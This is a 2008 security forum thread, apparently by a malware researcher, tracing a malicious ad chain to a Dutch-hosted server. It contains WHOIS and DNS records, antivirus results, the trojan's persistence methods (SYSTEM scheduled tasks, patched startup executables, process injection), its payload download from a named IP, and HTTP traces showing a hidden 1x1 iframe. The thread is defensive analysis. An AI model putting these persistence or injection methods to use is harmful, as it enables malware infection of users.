adecn.com IN NS ns5.msft.net 172800s (2.00:00:00)
adecn.com IN NS ns2.msft.net 172800s (2.00:00:00)
adecn.com IN SOA server: ns1.msft.net
email: msnhst.microsoft.com
serial: 2008011401
refresh: 1800
retry: 900
expire: 2419200
minimum ttl: 3600
86400s (1.00:00:00)
adecn.com IN MX preference: 10
exchange: maila.microsoft.com
900s (00:15:00)
adecn.com IN MX preference: 10
exchange: mailb.microsoft.com
900s (00:15:00)
adecn.com IN MX preference: 10
exchange: mailc.microsoft.com
900s (00:15:00)
100.222.10.209.in-addr.arpa IN CNAME 100.96-28.222.10.209.in-addr.arpa 13320s (03:42:00)
______________________________

www.axill.com

QUOTE
Address lookup
canonical name axill.com.
aliases www.axill.com

addresses 72.3.140.229

Domain Whois record
Queried whois.internic.net with "dom axill.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: AXILL.COM
Registrar: DSTR ACQUISITION VII, LLC
Whois Server: whois.dotregistrar.com
Referral URL: http://www.dotregistrar.com
Name Server: NS2.RACKSPACE.COM
Name Server: NS.RACKSPACE.COM
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: clientDeleteProhibited
Updated Date: 07-nov-2007
Creation Date: 20-sep-2004
Expiration Date: 20-sep-2012

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.dotregistrar.com with "axill.com"...

The information in this whois database is provided for the sole
purpose of assisting you in obtaining information about domain
name registration records. This information is available "as is,"
and we do not guarantee its accuracy. By submitting a whois
query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data
to: (1) enable high volume, automated, electronic processes that
stress or load this whois database system providing you this
information; or (2) allow,enable, or otherwise support the
transmission of mass, unsolicited, commercial advertising or
solicitations via facsimile, electronic mail, or by telephone to
entitites other than your own existing customers. The
compilation, repackaging, dissemination or other use of this data
is expressly prohibited without prior written consent from this
company. We reserve the right to modify these terms at any
time. By submitting an inquiry, you agree to these terms of usage
and limitations of warranty. Please limit your queries to 10 per
minute and one connection.

Registrant:
Axill Inc
50 Cragwood Road
Suite 210
Southplain Field,, Southplain Field, NJ 07080
Usa

Registrar: DOTREGISTRAR
Domain Name: AXILL.COM
Created on: 20-SEP-04
Expires on: 20-SEP-12
Last Updated on: 30-OCT-07

Administrative Contact:
Inc, Axill avilash1@hotmail.com
50 Cragwood Road
Suite 210
Southplain Field,, Southplain Field, NJ 07080
Usa
+91.7324159233
+91.9087048883

Technical Contact:
Inc, Axill avilashd@hotmail.com
50 Cragwood Road
Suite 210
Southplain Field,, Southplain Field, NJ 07080
Usa
+91.4023553771


Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM

End of Whois Information

Network Whois record
Queried whois.arin.net with "!NET-72-3-140-224-1"...

CustName: Axill
Address: 50 Cragwood Road, Suite 210
City: South Plainfield
StateProv: NJ
PostalCode: 07080
Country: US
RegDate: 2005-02-12
Updated: 2005-02-12

NetRange: 72.3.140.224 - 72.3.140.231
CIDR: 72.3.140.224/29
NetName: RSPC-60183-1108197622
NetHandle: NET-72-3-140-224-1
Parent: NET-72-3-128-0-1
NetType: Reassigned
Comment:
RegDate: 2005-02-12
Updated: 2005-02-12

RAbuseHandle: ABUSE45-ARIN
RAbuseName: Abuse Desk
RAbusePhone: +1-210-892-4000
RAbuseEmail: abuse@rackspace.com

RTechHandle: IPADM17-ARIN
RTechName: IPADMIN
RTechPhone: +1-210-892-4000
RTechEmail: ipadmin@rackspace.com

OrgAbuseHandle: ABUSE45-ARIN
OrgAbuseName: Abuse Desk
OrgAbusePhone: +1-210-892-4000
OrgAbuseEmail: abuse@rackspace.com

OrgTechHandle: IPADM17-ARIN
OrgTechName: IPADMIN
OrgTechPhone: +1-210-892-4000
OrgTechEmail: ipadmin@rackspace.com

OrgTechHandle: ZR9-ARIN
OrgTechName: Rackspace, com
OrgTechPhone: +1-210-892-4000
OrgTechEmail: hostmaster@rackspace.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
DNS query for 229.140.3.72.in-addr.arpa returned an error from the server: NameError

name class type data time to live
www.axill.com IN CNAME axill.com 12724s (03:32:04)
axill.com IN SOA server: ns.rackspace.com
email: hostmaster.rackspace.com
serial: 2007122606
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 300
300s (00:05:00)
axill.com IN NS ns.rackspace.com 86400s (1.00:00:00)
axill.com IN NS ns2.rackspace.com 86400s (1.00:00:00)
axill.com IN MX preference: 10
exchange: email.axill.com
86400s (1.00:00:00)
axill.com IN TXT v=spf1 ip4:84.45.70.0/24 mx ~all 86400s (1.00:00:00)
axill.com IN A 72.3.140.229 86400s (1.00:00:00)
References:

http://www.robtex.com/dns/www.axill.com.html
http://serversniff.net/asreport-41813.html
http://serversniff.net/asreport-15395.html
http://serversniff.net/asreport-33070.html
http://serversniff.net/nsr-axill.com
http://serversniff.net/asreport-153952735733070.html
______________________________

194.126.193.157

QUOTE
Address lookup
canonical name hosted-by.adulteuhost.com.
aliases
addresses 194.126.193.157

Domain Whois record
Queried whois.internic.net with "dom adulteuhost.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ADULTEUHOST.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.ADULTEUHOST.COM
Name Server: DNS2.ADULTEUHOST.COM
Name Server: DNS3.ADULTEUHOST.COM
Status: clientTransferProhibited
Status: clientDeleteProhibited
Updated Date: 01-aug-2007
Creation Date: 20-aug-2005
Expiration Date: 20-aug-2008

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.enom.com with "adulteuhost.com"...

=-=-=-=
Visit AboutUs.org for more information about adulteuhost.com
<a href="http://www.aboutus.org/adulteuhost.com">AboutUs: adulteuhost.com</a>

Registration Service Provided By: InterXS
Contact: admin@interxs.nl
Visit: http://www.interxs.nl

Domain name: adulteuhost.com

Registrant Contact:
AdultEUhost.com
Domain Services (noc@adulteuhost.com)
+31.206138807
Fax: +31.
PO BOX 20646
Amsterdam, NOORD-HOLLAND 1001 NP
NL

Administrative Contact:
AdultEUhost.com
Domain Services (noc@adulteuhost.com)
+31.206138807
Fax: +31.
PO BOX 20646
Amsterdam, NOORD-HOLLAND 1001 NP
NL

Technical Contact:
AdultEUhost.com
Domain Services (noc@adulteuhost.com)
+31.206138807
Fax: +31.
PO BOX 20646
Amsterdam, NOORD-HOLLAND 1001 NP
NL

Status: Locked

Name Servers:
dns1.adulteuhost.com
dns2.adulteuhost.com
dns3.adulteuhost.com

Creation date: 21 Aug 2005 00:37:17
Expiration date: 21 Aug 2008 00:37:17
=-=-=-=
The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about or
related to a domain name registration record. We make this information
available "as is," and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data to: (1)
enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or (2) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic
mail, or by telephone. The compilation, repackaging, dissemination or
other use of this data is expressly prohibited without prior written
consent from us.

We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002

Network Whois record
Queried whois.ripe.net with "-B 194.126.193.157"...

% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '194.126.193.0 - 194.126.193.255'

inetnum: 194.126.193.0 - 194.126.193.255
netname: EASYCARRIER-IPv4-5
descr: AdultEUhosting IPv4 Assignment #3
country: NL
org: ORG-eCB2-RIPE
admin-c: eCN3-RIPE
tech-c: eCN3-RIPE
status: ASSIGNED PI
notify: noc@easycarrier.net
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-by: EASYCARRIER-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: EASYCARRIER-MNT
mnt-domains: EASYCARRIER-MNT
changed: hostmaster@ripe.net 20050128
changed: hostmaster@ripe.net 20051014
changed: noc@easycarrier.net 20060101
source: RIPE

organisation: ORG-eCB2-RIPE
org-name: easyCarrier Communications B.V.
org-type: OTHER
address: Gyroscoopweg 2F
e-mail: noc@easycarrier.net
mnt-ref: EASYCARRIER-MNT
mnt-by: EASYCARRIER-MNT
changed: noc@globaleurope.net 20040126
changed: ripe-dbm@ripe.net 20070102
source: RIPE

role: easyCarrier Communications NOC
address: Gyroscoopweg 2E & 2F
e-mail: noc@easycarrier.net
admin-c: LC1910-RIPE
tech-c: LC1910-RIPE
nic-hdl: eCN3-RIPE
changed: noc@easycarrier.net 20040126
source: RIPE

% Information related to '194.126.193.0/24AS30913'

route: 194.126.193.0/24
descr: Route to InterXS IP Network
origin: AS30913
mnt-by: INTERXS-MNT
source: RIPE
changed: noc@adulteuhost.com 20051013

DNS records
DNS query for hosted-by.adulteuhost.com returned an error from the server: NameError

name class type data time to live
adulteuhost.com IN A 194.116.146.5 3600s (01:00:00)
adulteuhost.com IN SOA server: dns1.adulteuhost.com
email: hostmaster.interxs.nl
serial: 2006102800
refresh: 14400
retry: 3600
expire: 604800
minimum ttl: 3600
3600s (01:00:00)
adulteuhost.com IN NS dns2.adulteuhost.com 3600s (01:00:00)
adulteuhost.com IN MX preference: 10
exchange: mail.adulteuhost.com
3600s (01:00:00)
adulteuhost.com IN NS dns3.adulteuhost.com 3600s (01:00:00)
adulteuhost.com IN NS dns1.adulteuhost.com 3600s (01:00:00)
157.193.126.194.in-addr.arpa IN PTR hosted-by.adulteuhost.com 3600s (01:00:00)
References:
http://serversniff.net/asreport-194.126.193.157.html
Kimberly
I’m pleased to announce that AdECN took the necessary steps in order to fix the issue. I’ve checked back the site where I did encounter the adverts and no more banners from 199.202.248.50 are displayed.

199.202.248.50 is still up and running, so don't visit the links and watch out while surfing as you might encounter them elsewhere.
Kimberly
I had a rather unpleasant surprise tonight when quickly visiting the website … … the advertisement is active again. Unfortunately I didn’t have Ethereal running but I was able to save the firewall web history log, the ProcessGuard alert and the banner as seen below. Sorry for the large firewall capture, but it's the only way to show the full link without getting cut off.
IPB ImageClick on the image to enlarge

IPB Image

IPB Image
Furthermore .... although I have 2 submission tickets for 199.202.248.50, Verizon did choose to remain silent also …

Update - 5th February 2008.

I immediately did report the incident and during the night it was fixed by AdECN.


Note: Initially posted on 4th February 2008 11:49 PM
Kimberly
Not related to the advert itself but I stumbled on a similar file today while checking some websites.

<h4>
File details
</h4>
Filename: svcipa.exe

File size: 23616 bytes
MD5: ef1f0ae41e71c5a6997a0bee743416bb
SHA1: d3bbc62f8db9a317febd066c21587704df9f2424
PEiD: -
packers: UPX
QUOTE
File svcipa.exe received on 02.27.2008 17:49:56 (CET)
AhnLab-V3 2008.2.27.0 2008.02.27 Win-Trojan/Xema.variant
AntiVir 7.6.0.67 2008.02.27 TR/Crypt.ULPM.Gen
Authentium 4.93.8 2008.02.27 -
Avast 4.7.1098.0 2008.02.27 -
AVG 7.5.0.516 2008.02.27 -
BitDefender 7.2 2008.02.27 GenPack:Generic.Malware.Sdld.AA242CF4
CAT-QuickHeal 9.50 2008.02.26 -
ClamAV 0.92.1 2008.02.27 -
DrWeb 4.44.0.09170 2008.02.27 -
eSafe 7.0.15.0 2008.02.26 suspicious Trojan/Worm
eTrust-Vet 31.3.5567 2008.02.27 -
Ewido 4.0 2008.02.27 -
FileAdvisor 1 2008.02.27 -
Fortinet 3.14.0.0 2008.02.27 -
F-Prot 4.4.2.54 2008.02.26 W32/Heuristic-USU!Eldorado
F-Secure 6.70.13260.0 2008.02.27 Trojan-Downloader.Win32.Firu.bp
Ikarus T3.1.1.20 2008.02.27 Win32.SuspectCrc
Kaspersky 7.0.0.125 2008.02.27 Trojan-Downloader.Win32.Firu.bp
McAfee 5238 2008.02.26 -
Microsoft 1.3301 2008.02.27 Trojan:Win32/Bohmini.A
NOD32v2 2906 2008.02.27 -
Norman 5.80.02 2008.02.26 -
Panda 9.0.0.4 2008.02.27 Suspicious file
Prevx1 V2 2008.02.27 -
Rising 20.33.22.00 2008.02.27 -
Sophos 4.27.0 2008.02.27 Mal/HckPk-A
Sunbelt 3.0.893.0 2008.02.23 -
Symantec 10 2008.02.27 -
TheHacker 6.2.9.229 2008.02.25 -
VBA32 3.12.6.2 2008.02.27 -
VirusBuster 4.3.26:9 2008.02.27 -
Webwasher-Gateway 6.6.2 2008.02.27 Trojan.Crypt.ULPM.Gen
<h4>
Technical details
</h4>
Registry changes.
  • Adds the following Values.
    QUOTE
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent "LastTaskRun"
    Type: REG_BINARY
    Data: D8, 07, 02, 00, 03, 00, 1B, 00, 11, 00, 00, 00, 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
  • Deletes the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
  • Modifies the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
Files added.
QUOTE
c:\bold.log
Date: 2/27/2008 5:00 PM
Size: 3,010 bytes
%Temp%\1Ll5OSVH.hdi
Date: 2/27/2008 5:00 PM
Size: 0 bytes
%System%\[RANDOM NAME].exe
Date: 2/27/2008 4:58 PM
Size: 23,616 bytes

c:\WINDOWS\Tasks\At1.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes

up to

c:\WINDOWS\Tasks\At24.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes
Note:%Temp% is a variable that refers to the temporary folder in the short path form. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


<h4>
Notes
</h4>
Same initial behavior as jfidoj1.exe.
  • Copies itself to the %System% folder under a Random name, SR5166N7.exe.exe in our analysis.
  • Tries to inject itself in most running processes (writes to the virtual memory) and creates different mutexes to mark its presence on the system. Processes that have been modified try to inject code into new processes too.

    IPB Image

    IPB Image
  • One or more of the hooked processes connect to internet and browser.php is requested from 194.126.193.157. This is actually an excutable and it will be ran on the computer by one of the "infected" processes.
    Analysis: <a href="http://www.virustotal.com/analisis/5490b7afb56f56ede0bbcb776a173d43" target="_blank">http://www.virustotal.com/analisis/5490b7a...0bbcb776a173d43</a>
  • Since 24 scheduled tasks are created, the program gets loaded every hour and every day (even after a reboot or shutdown). The tasks have been created under the SYSTEM account.
Now comes the new & interesting part ... we notice that some files have been backed up.

QUOTE
c:\Program Files\Common Files\Symantec Shared\ccApp.ex_
Date: 9/14/2002 7:21 PM
Size: 54,976 bytes
c:\Program Files\Common Files\Symantec Shared\ccRegVfy.ex_
Date: 9/14/2002 7:22 PM
Size: 38,592 bytes
c:\Program Files\Virtual Machine Additions\vmusrvc.ex_
Date: 1/26/2007 7:09 AM
Size: 112,008 bytes
If you run a Hijackthis log, you will see that they are part of the programs loaded at windows startup.

QUOTE
O4 - HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual Machine Additions\vmusrvc.exe
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Common Files\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
They have been modified by the infection.

QUOTE
c:\Program Files\Common Files\Symantec Shared\ccApp.exe
Old date: 9/14/2002 7:21 PM
New date: 9/14/2002 7:21 PM
Old size: 54,976 bytes
New size: 63,168 bytes
c:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe
Old date: 9/14/2002 7:22 PM
New date: 9/14/2002 7:22 PM
Old size: 38,592 bytes
New size: 46,784 bytes
c:\Program Files\Virtual Machine Additions\vmusrvc.exe
Old date: 1/26/2007 7:09 AM
New date: 1/26/2007 7:09 AM
Old size: 112,008 bytes
New size: 120,200 bytes
A hex editor reveals that several parts have been replaced but the one below is the most interesting. We notice the presence of shell32.dll ShellExecuteA C:\WINDOWS\system32\SR5166N7.exe which is an additional loading point to ensure that the malware will run even if the scheduled tasks don't run.

IPB Image
The infection also kept a log of what it did perform during initial install.

CODE
1928 (c:\windows\temp\svcipa.exe): bold_shm_init() enter
1928 (c:\windows\temp\svcipa.exe): Start_TS_Service() enter
1928 (c:\windows\temp\svcipa.exe): Start_TS_Service() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Infect_Startup enter
1928 (c:\windows\temp\svcipa.exe): Infect Startup exit
820 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() enter
820 (C:\WINDOWS\system32\SR5166N7.exe): InsertID enter
820 (C:\WINDOWS\system32\SR5166N7.exe): InsertID exit
820 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() exit
820 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() returned 1
736 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() enter
736 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() returned 0
Kimberly
<h4>
Extra reading
</h4>
IPB Image

By Nicolas Brulez, 'Security Researcher' at Websense.
Kimberly
<h4>
jfidoj.exe - 247mediadirect.com - 194.126.193.160
</h4>
The infection comes now from 247mediadirect.com - 194.126.193.160.

Website Title: None given.
ICANN Registrar: INTERCOSMOS MEDIA GROUP, INC. D/B/A DIRECTNIC.COM
Created: 2008-05-18
Expires: 2009-05-18
Updated: 2008-05-19
Name Server: NS0.DIRECTNIC.COM (has 354,782 domains)
Name Server: NS1.DIRECTNIC.COM
Whois Server: whois.directnic.com

IP Address: 194.126.193.160
IP Location - Noord-holland - Amsterdam - Easycarrier-ipv
Dedicated Hosting: 247mediadirect.com is hosted on a dedicated server.

Registrant:
Media Hosting Ltd.
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Domain Name: 247MEDIADIRECT.COM

Administrative Contact:
Pearson, Ross rpearson79@yahoo.com
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Technical Contact:
Pearson, Ross rpearson79@yahoo.com
32 Jacka Blvd
St Kilda VIC, Melbourne 3182
AU
+61-03-9534-52830

Record expires on 05-19-2009
Record created on 05-19-2008

Domain servers in listed order:
NS0.DIRECTNIC.COM 69.46.233.245
NS1.DIRECTNIC.COM 69.46.234.245

<h4>
Network traces
</h4>
CODE
GET http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=617;spotId=7094;c=0;ms=1214666468209
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ads.adbrite.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.adbrite.com/p3p.xml",CP="NOI NID"
Set-Cookie: b=4190%3A%3Adh8i%2C3ygf%2C4190; expires=Sun, 28-Jun-2009 15:21:24 GMT; path=/; domain=.adbrite.com
Content-type: text/html
Date: Sat, 28 Jun 2008 15:21:24 GMT
Server: lighttpd/1.4.19

165
<html> <head> </head> <body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- BEGIN STANDARD TAG - 468 x 60 - ROS: Run-of-site - DO NOT MODIFY -->
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=468 HEIGHT=60 SRC="http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60§ion=321066"></IFRAME>
<!-- END TAG --> </body> </html>
0

The page below contains our next location, being 247mediadirect.com/media/1/9550/468x60

CODE
GET http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=468x60§ion=321066 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: ad.yieldmanager.com
Proxy-Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Sat, 28 Jun 2008 15:21:25 GMT
Server: Right Media Ad Server/405
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: fl_inst=; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=created=1214666436&lastCounted=1214666436&uid=c25febc6-4525-11dd-ae82-001e0b5a03f8&_hmacv=1&_salt=85413568&_keyid=k1&_hmac=2a5197aaa08d2d9c1aa26fb0820bc6ce0072fe77; expires=Mon, 28-Jul-2008 15:21:25 GMT
Set-Cookie: lifb=sP.YoIgkW70<%QS<We8e*McuM; expires=Sat, 05-Jul-2008 15:21:25 GMT
Set-Cookie: vuday1=oEKx`B[ApMNG's!Ywi5s; expires=Sun, 29-Jun-2008 00:00:00 GMT
Set-Cookie: fl_inst=1; expires=Thu, 25-Dec-2008 15:21:25 GMT
Set-Cookie: pv1="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: pc1="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: ih="b!!!!'!#[,7!!!!#:9osF!#[AA!!!!#:9osk!#]`b!!!!#:9osu!#^@.!!!!#:9osK"; path=/; expires=Mon, 28-Jun-2010 15:21:25 GMT
Set-Cookie: vh="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: bh="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: ia="b"; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Location: http://247mediadirect.com/media/1/9550/468x60
Cache-Control: no-store
Last-Modified: Sat, 28 Jun 2008 15:21:25 GMT
Pragma: no-cache
Content-Length: 0
Connection: close

From there on, we retrieve the banner to be displayed and an iframe pointing to 247mediadirect.com/jh/f.php?id=9550

CODE
GET http://247mediadirect.com/media/1/9550/468x60 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ads.adbrite.com/adserver/display_iab_ads.php?sid=628866&title_color=0000FF&text_color=000000&background_color=FFFFFF&border_color=CCCCCC&url_color=008000&
newwin=&zs=&width=468&height=60&
url=http%3A%2F%2Fwww.axill.com%2Fcpm%2FCpm.aspx%3Faffid%3D31637%26W%3D468
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Date: Sat, 28 Jun 2008 22:56:44 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
~~~~~~~~~~~~~~: ~~~
Content-Type: text/html

152

<HTML><BODY><A HREF="http://247mediadirect.com/action/1/9550/97" TARGET="_blank"><IMG SRC="http://247mediadirect.com/ad/images/468x60/40370.gif"></A><iframe src="http://247mediadirect.com/jh/f.php?id=9550"  frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=1 height=1></iframe></BODY></HTML>

0

The banner.

CODE
GET http://247mediadirect.com/ad/images/468x60/40370.gif HTTP/1.1
Accept: */*
Referer: http://247mediadirect.com/media/1/9550/468x60
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

IPB Image

IPB Image
247mediadirect.com/jh/f.php?id=9550 contains a VBS script to contruct the next URL.

CODE
GET http://247mediadirect.com/jh/f.php?id=9550 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://247mediadirect.com/media/1/9550/468x60
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 247mediadirect.com
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Transfer-Encoding: chunked
Date: Sat, 28 Jun 2008 22:56:46 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
X-Powered-By: PHP/5.2.0
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
~~~~~~~~~~~~~~: ~~~~
Content-Type: text/html

16C
<br />
